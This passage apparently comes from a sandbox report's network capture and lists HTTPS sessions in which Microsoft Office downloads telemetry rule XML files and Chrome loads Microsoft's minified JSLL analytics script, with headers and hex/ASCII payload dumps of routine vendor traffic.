                                                                                2024-10-04 09:34:07 UTC3565INData Raw: 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65
                                                                                Data Ascii: -")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChange


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                91192.168.2.55550013.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:07 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:07 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1395
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                ETag: "0x8DC582BE017CAD3"
                                                                                x-ms-request-id: a68e09c4-f01e-0052-148c-159224000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55d6fcl6x6bw8cpdc0000000c3g00000000bnh6
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                92192.168.2.55549913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:07 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:07 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1356
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                ETag: "0x8DC582BDF66E42D"
                                                                                x-ms-request-id: 3ef81e2a-f01e-001f-3f8c-155dc8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55qkvj6n60pxm9mbw00000001gg000000004v93
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                93192.168.2.55550113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:07 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:07 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1358
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                ETag: "0x8DC582BE6431446"
                                                                                x-ms-request-id: 6a90313a-301e-005d-1a8c-15e448000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55ncqdn59ub6rndq00000000bz00000000077um
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                94192.168.2.55550213.107.246.604436020C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:07 UTC370OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                Host: js.monitor.azure.com
                                                                                Connection: keep-alive
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: none
                                                                                Sec-Fetch-Mode: cors
                                                                                Sec-Fetch-Dest: empty
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                2024-10-04 09:34:07 UTC958INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/javascript; charset=utf-8
                                                                                Content-Length: 207771
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                Last-Modified: Mon, 16 Sep 2024 18:20:53 GMT
                                                                                ETag: 0x8DCD67C4CF3530C
                                                                                x-ms-request-id: a84a52c5-d01e-00d3-671a-0ff173000000
                                                                                x-ms-version: 2009-09-19
                                                                                x-ms-meta-jssdkver: 4.3.2
                                                                                x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.2.min.js
                                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                Access-Control-Allow-Origin: *
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55sdcjq8ksxt4n9mc00000001mg000000007snt
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache-Info: L1_T2
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC15426INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 32 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                Data Ascii: /*! * 1DS JSLL SKU, 4.3.2 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                2024-10-04 09:34:08 UTC16384INData Raw: 5b 22 6f 6e 22 2b 74 5d 29 3f 6e 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 78 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 6d
                                                                                Data Ascii: ["on"+t])?n(i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}xe(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),m
                                                                                2024-10-04 09:34:08 UTC16384INData Raw: 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 72 6e 28 6c 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 70 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 64 63 3d 70 63 3b 66 75 6e 63 74 69 6f 6e 20 70 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 66 6f 28 65 2c 73 63 29 5b 47 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 70 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 59 28 65 2c 22 6c 69 73 74 65 6e 65 72 73 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29
                                                                                Data Ascii: [te]({fn:r,arg:e}),n.h=n.h||rn(lc,0,n)):M(r,[e]))})}pc.__ieDyn=1;var dc=pc;function pc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=fo(e,sc)[Gn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(pc,this,function(e){Y(e,"listeners",{g:function(){return i}})
                                                                                2024-10-04 09:34:08 UTC16384INData Raw: 6f 2c 61 29 2c 66 5b 76 72 5d 28 29 2c 6f 5b 66 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 63 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 72 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 5a 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 5a 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 41 5b 74 65 5d 28 65 29 2c 6f 2e 61 64 64 65 64 3d 5b 65 5d 2c 67 28 6f 29 2c 72 26 26 72 28 21
                                                                                Data Ascii: o,a),f[vr](),o[fr](a)},6,n),i},f[cr]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ru);var i=s(e[Zn]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[Zn]+"] is already loaded!");var a,o={reason:16};function c(){A[te](e),o.added=[e],g(o),r&&r(!
                                                                                2024-10-04 09:34:08 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 20 45 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 63 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 77 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 62 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 49 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 6b 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 5f 6c 28 29 7b 72 65 74 75 72 6e 20 53 6c 28 29 3f 45 6c 28 62 6c 2e 53 65 73 73 69 6f 6e 53 74 6f
                                                                                Data Ascii: function El(e){try{if(oe(ct()))return null;var t=(new Date)[ws](),n=fe(e===bl.LocalStorage?"localStorage":"sessionStorage"),r=Il+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[ks](r),!i)return n}catch(a){}return null}function _l(){return Sl()?El(bl.SessionSto
                                                                                2024-10-04 09:34:08 UTC16384INData Raw: 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 5f 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 66 64 5d 3d 4f 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 53 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 65 29 7b 76 61 72 20 6f 3d 74 68 69 73 2c 63 3d 7b 7d 3b 6f 2e 73 74 61 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 6e
                                                                                Data Ascii: not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var _d=function(e,t){this[fd]=Ot(),this.pageName=e,this.pageUrl=t},Sd=function(a,e){var o=this,c={};o.start=function(e){"un
                                                                                2024-10-04 09:34:08 UTC16384INData Raw: 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 6a 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 72 63 28 29 7d 2c 74 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54 61 67 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 6e 2e 5f 70 61 67 65 54 61 67 73 3d 7b 7d 2c
                                                                                Data Ascii: Type=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=jd(r._config),t.cookieEnabled=rc()},tp.prototype._setPageTags=function(e,t){var n=this;n._pageTags={},
                                                                                2024-10-04 09:34:08 UTC16384INData Raw: 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 78 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d 65 7c 7c 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72
                                                                                Data Ascii: aBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},xp.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].name||~t[n].name.indexOf("data-bi-"))return!0;r
                                                                                2024-10-04 09:34:08 UTC16384INData Raw: 22 2c 70 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 67 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 76 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 68 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 6d 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 79 67 3d 22 63 6f 6e 63 61 74 22 2c 43 67 3d 22 69 4b 65 79 22 2c 62 67 3d 22 63 6f 75 6e 74 22 2c 54 67 3d 22 65 76 65 6e 74 73 22 2c 49 67 3d 22 70 75 73 68 22 2c 45 67 3d 22 73 70 6c 69 74 22 2c 5f 67 3d 22 73 70 6c 69 63 65 22 2c 53 67 3d 22 74 6f 4c 6f 77 65 72 43 61 73 65 22 2c 78 67 3d 22 68 64 72 73 22 2c 4e 67 3d 22 75 73 65 48 64 72 73
                                                                                Data Ascii: ",pg="allowRequestSending",gg="firstRequestSent",vg="shouldAddClockSkewHeaders",hg="getClockSkewHeaderValue",mg="setClockSkew",ye="length",yg="concat",Cg="iKey",bg="count",Tg="events",Ig="push",Eg="split",_g="splice",Sg="toLowerCase",xg="hdrs",Ng="useHdrs
                                                                                2024-10-04 09:34:08 UTC16384INData Raw: 28 65 5b 67 76 5d 3d 30 29 2c 65 5b 76 76 5d 7c 7c 28 65 5b 76 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 68 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 76 76 5d 3d 33 2c 65 5b 68 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 59 69 28 65 29 29 2c 48 5b 5a 67 5d 28 43 76 2e 63 72 65 61 74 65 28 65 5b 43 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 68 76 5d 3f 31 3a 65 5b 68 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 76 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c 74 29 3a 28 72 3d 31 2c 69 3d 32 30 2c 34 3d 3d 3d 6e 26 26 28 72 3d 34 2c 69 3d 31 29 2c 61 3d 21 30 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 66 6f
                                                                                Data Ascii: (e[gv]=0),e[vv]||(e[vv]=1),l(e),e[hv])if(U||ae)e[vv]=3,e[hv]=!1;else if(H)return W&&(e=Yi(e)),H[Zg](Cv.create(e[Cg],[e]),!0===e[hv]?1:e[hv],3);var n=e[vv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,t):(r=1,i=20,4===n&&(r=4,i=1),a=!0,function(e,t,n,r){fo


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                95192.168.2.55551413.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:08 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:08 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:08 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1395
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                ETag: "0x8DC582BDE12A98D"
                                                                                x-ms-request-id: 1392789d-401e-0047-0e8c-158597000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093408Z-15767c5fc55jdxmppy6cmd24bn00000004p0000000001hhb
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
